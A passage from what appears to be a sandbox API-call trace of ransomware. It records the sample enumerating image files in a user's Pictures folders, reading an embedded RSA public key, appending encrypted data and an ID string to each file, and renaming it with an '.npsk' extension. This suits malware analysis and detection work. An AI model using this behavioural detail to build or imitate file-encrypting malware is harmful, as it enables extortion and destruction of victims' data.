(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xSnul.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\xsnul.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xSnul.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\xsnul.bmp.npsk")) returned 1 [0217.441] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a7f000, ftCreationTime.dwHighDateTime=0x1d5d84e, ftLastAccessTime.dwLowDateTime=0xbf920e40, ftLastAccessTime.dwHighDateTime=0x1d5e4a3, ftLastWriteTime.dwLowDateTime=0xbf920e40, ftLastWriteTime.dwHighDateTime=0x1d5e4a3, nFileSizeHigh=0x0, nFileSizeLow=0x181b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xSnul.bmp", cAlternateFileName="")) returned 0 [0217.441] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.441] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.441] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.441] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\") returned="m8MPhSNWcQuWMqMN Jsf\\" [0217.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\") returned="WVIC0My\\" [0217.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0217.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.442] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.442] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.442] PathFindFileNameW (pszPath="") returned="" [0217.442] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d4ebb20, ftCreationTime.dwHighDateTime=0x1d5dbfc, ftLastAccessTime.dwLowDateTime=0x3bba3d20, ftLastAccessTime.dwHighDateTime=0x1d5d7f8, ftLastWriteTime.dwLowDateTime=0x3bba3d20, ftLastWriteTime.dwHighDateTime=0x1d5d7f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.444] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d4ebb20, ftCreationTime.dwHighDateTime=0x1d5dbfc, ftLastAccessTime.dwLowDateTime=0x3bba3d20, ftLastAccessTime.dwHighDateTime=0x1d5d7f8, ftLastWriteTime.dwLowDateTime=0x3bba3d20, ftLastWriteTime.dwHighDateTime=0x1d5d7f8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.444] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x343324d0, ftCreationTime.dwHighDateTime=0x1d5e4dd, ftLastAccessTime.dwLowDateTime=0x7ae590, ftLastAccessTime.dwHighDateTime=0x1d5e3a9, ftLastWriteTime.dwLowDateTime=0x7ae590, ftLastWriteTime.dwHighDateTime=0x1d5e3a9, nFileSizeHigh=0x0, nFileSizeLow=0xcba1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Kgovd_.jpg", cAlternateFileName="")) returned 1 [0217.444] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\7Kgovd_.jpg") returned=".jpg" [0217.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\7Kgovd_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\7kgovd_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.444] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=52129) returned 1 [0217.444] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.446] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xcb7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.446] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.447] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xcba1, lpOverlapped=0x0) returned 1 [0217.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.448] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.449] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.449] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.449] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.449] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.449] GetLastError () returned 0x0 [0217.449] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.449] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.450] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.450] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.450] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.450] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.450] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xcba1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.450] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.451] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.451] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.451] CloseHandle (hObject=0x61c) returned 1 [0217.453] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\7Kgovd_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\7kgovd_.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\7Kgovd_.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\7kgovd_.jpg.npsk")) returned 1 [0217.455] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae95cd00, ftCreationTime.dwHighDateTime=0x1d5e405, ftLastAccessTime.dwLowDateTime=0x357967c0, ftLastAccessTime.dwHighDateTime=0x1d5e0bc, ftLastWriteTime.dwLowDateTime=0x357967c0, ftLastWriteTime.dwHighDateTime=0x1d5e0bc, nFileSizeHigh=0x0, nFileSizeLow=0x19c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="emrS.bmp", cAlternateFileName="")) returned 1 [0217.455] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\emrS.bmp") returned=".bmp" [0217.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\emrS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\emrs.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.456] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=6592) returned 1 [0217.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.458] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x199a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.458] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.459] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x19c0, lpOverlapped=0x0) returned 1 [0217.460] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.460] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.460] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.460] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.461] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.461] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.461] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.461] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.461] GetLastError () returned 0x0 [0217.461] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.461] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.461] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.461] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.461] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.462] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.462] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x19c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.462] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.462] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.462] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.462] CloseHandle (hObject=0x61c) returned 1 [0217.463] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\emrS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\emrs.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\emrS.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\emrs.bmp.npsk")) returned 1 [0217.465] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9ae41f0, ftCreationTime.dwHighDateTime=0x1d5d920, ftLastAccessTime.dwLowDateTime=0x27b14510, ftLastAccessTime.dwHighDateTime=0x1d5e2b3, ftLastWriteTime.dwLowDateTime=0x27b14510, ftLastWriteTime.dwHighDateTime=0x1d5e2b3, nFileSizeHigh=0x0, nFileSizeLow=0x150fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nq8UUEtvGokSVnkM.png", cAlternateFileName="NQ8UUE~1.PNG")) returned 1 [0217.465] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\Nq8UUEtvGokSVnkM.png") returned=".png" [0217.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\Nq8UUEtvGokSVnkM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\nq8uuetvgoksvnkm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.465] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=86266) returned 1 [0217.465] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.467] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x150d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.467] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.468] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x150fa, lpOverlapped=0x0) returned 1 [0217.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.469] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.470] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.470] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.470] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.470] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.470] GetLastError () returned 0x0 [0217.471] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.471] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.471] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.471] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.471] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.471] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.472] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x150fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.472] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.472] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.472] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.472] CloseHandle (hObject=0x61c) returned 1 [0217.474] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\Nq8UUEtvGokSVnkM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\nq8uuetvgoksvnkm.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\Nq8UUEtvGokSVnkM.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\nq8uuetvgoksvnkm.png.npsk")) returned 1 [0217.475] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8880a6b0, ftCreationTime.dwHighDateTime=0x1d5dff2, 